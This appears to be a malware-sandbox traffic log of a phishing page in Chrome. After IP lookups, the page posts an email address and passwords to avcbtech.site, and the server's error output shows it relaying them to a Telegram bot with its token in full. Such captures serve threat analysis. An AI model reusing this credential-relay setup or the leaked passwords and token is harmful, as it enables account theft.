2025-03-24 13:42:22 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49726	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:40 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:40 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:42:40 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925697d7abf1f3e6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104671&min_rtt=103628&rtt_var=22951&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35948&cwnd=227&unsent_bytes=0&cid=f94c4a1e7bb70e1f&ts=267&x=0"
2025-03-24 13:42:40 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49727	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:41 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:41 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:42:41 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925697db784f3869-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97911&min_rtt=97334&rtt_var=21098&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38253&cwnd=233&unsent_bytes=0&cid=eef77b7fc044713a&ts=251&x=0"
2025-03-24 13:42:41 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49730	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:48 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:48 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:42:48 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569808afaa086e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97907&min_rtt=96834&rtt_var=21528&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=38451&cwnd=230&unsent_bytes=0&cid=1af64805c7d194fc&ts=259&x=0"
2025-03-24 13:42:48 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49729	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:48 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 55 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:48 UTC	55	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d 45 37 46 25 35 45 66 4c 25 33 41 4a 25 32 42 30 4c 25 35 45 25 37 43 58 35 25 35 44 25 35 42 Data Ascii: ai=apply%40peo.on.ca&pr=E7F%5EfL%3AJ%2B0L%5E%7CX5%5D%5B
2025-03-24 13:43:05 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:42:48 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=726e264ddc7364b17a64f09f91347f52; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:05 UTC	898	IN	Data Raw: 33 33 66 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 39 33 39 37 33 35 39 34 36 3a 41 41 46 71 61 42 69 51 4b 38 73 41 6c 54 73 5f 5f 5a 45 65 41 4e 6b 74 74 53 7a 31 6d 5a 58 39 67 4e 34 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 61 7a 76 69 78 74 62 61 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 66 75 6b 2f 78 77 70 73 2e 70 68 70 3c 2f 62 Data Ascii: 33f<br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7939735946:AAFqaBiQK8sAlTs__ZEeANkttSz1mZX9gN4/sendMessage): failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/azvixtba/public_html/fuk/xwps.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49731	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:48 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:48 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:42:48 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9256980b9a12dc28-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97488&min_rtt=97330&rtt_var=20667&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38262&cwnd=245&unsent_bytes=0&cid=7b3dca22f8fcf0be&ts=254&x=0"
2025-03-24 13:42:48 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49734	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:05 UTC	389	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:06 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49740	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:20 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 40 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:20 UTC	40	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d 25 32 36 6d 79 6f 38 58 41 72 4c 49 63 79 52 63 Data Ascii: ai=apply%40peo.on.ca&pr=%26myo8XArLIcyRc
2025-03-24 13:43:33 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:20 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=1f27497db403fefa1428d18499032e1e; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:33 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49742	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:20 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:21 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:21 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925698d568afc472-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96063&min_rtt=95963&rtt_var=20397&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=38691&cwnd=245&unsent_bytes=0&cid=6cf71c9e383be6be&ts=255&x=0"
2025-03-24 13:43:21 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49744	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:21 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:21 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:21 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925698d83d9dc33c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97131&min_rtt=97057&rtt_var=20588&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=38292&cwnd=246&unsent_bytes=0&cid=742bf60980646ad0&ts=252&x=0"
2025-03-24 13:43:21 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49749	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:33 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:43:33 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:33 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:33 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49752	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
